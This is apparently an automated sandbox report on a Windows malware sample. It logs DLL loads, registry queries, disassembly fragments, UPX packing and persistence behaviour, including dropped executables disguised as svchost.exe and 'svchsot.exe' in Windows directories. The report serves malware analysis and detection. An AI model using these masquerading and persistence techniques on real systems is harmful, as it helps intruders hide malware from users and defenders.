Source: C:\Windows\Temp\ .exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: profext.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: avicap32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: msvfw32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: msvcp60.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: avicap32.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: msvfw32.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: msvcp60.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: apphelp.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: wininet.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: avicap32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: msvfw32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: winmm.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: winmm.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: urlmon.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: iertutil.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: srvcli.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: netutils.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: msvcp60.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: netapi32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: samcli.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: apphelp.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: wininet.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: avicap32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: msvfw32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: winmm.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: winmm.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: urlmon.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: iertutil.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: srvcli.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: netutils.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: msvcp60.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: netapi32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: samcli.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\Temp\ .exe

Window found: window name: SysTabControl32

Jump to behavior

Source: C:\Windows\Temp\ .exe	Automated click: OK
Source: C:\Windows\Temp\ .exe	Automated click: OK
Source: C:\Windows\Temp\ .exe	Automated click: OK
Source: C:\Windows\Temp\ .exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Temp\ .exe

Window detected: Number of UI elements: 96

Source:	Binary string: f:\SystemTool Eng 19\SystemTool Eng 16\SystemTool Eng 52\SystemTool\Release\SystemTool.pdb source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.0000000002851000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe, 00000005.00000000.1324754830.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe.0.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdbEG source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb4 source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\ntkrnlmp.pdb source: .exe, 00000005.00000002.2705674625.00000000024E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: -00c04fd929dbmp\\Symbols\winload_prod.pdbrord32_super_sbx\Adobe\Acrob source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405CFF

Source: v5.exe.0.dr

Static PE information: section name: UPX2

Source: C:\Windows\Temp\v5.exe	Code function: 2_2_00408FB0 push eax; ret	2_2_00408FDE
Source: C:\Windows\Temp\server.exe	Code function: 3_2_004046E0 push eax; ret	3_2_0040470E
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10069820 push eax; ret	3_2_1006984E
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100FAA45 push edi; ret	3_2_100FAA46
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10025EF1 push cs; ret	3_2_10025EF2
Source: C:\Windows\Temp\v5.exe	Code function: 4_2_00408FB0 push eax; ret	4_2_00408FDE
Source: C:\Windows\Temp\ .exe	Code function: 5_2_004483B0 push eax; ret	5_2_004483CE
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00447450 push eax; ret	5_2_00447464
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00447450 push eax; ret	5_2_0044748C
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00449957 push ecx; ret	5_2_00449967
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_004046E0 push eax; ret	8_2_0040470E
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10069820 push eax; ret	8_2_1006984E
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100FAA45 push edi; ret	8_2_100FAA46
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10025EF1 push cs; ret	8_2_10025EF2

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\svchost.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\svchost.exe			Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\Temp\server.exe	Executable created and started: C:\Windows\SysWOW64\033726\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Executable created and started: C:\Windows\SysWOW64\034031\svchost.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Executable created and started: C:\Windows\temp\server.exe	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Executable created and started: C:\Windows\temp\ .exe	Jump to behavior
Source: unknown	Executable created and started: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
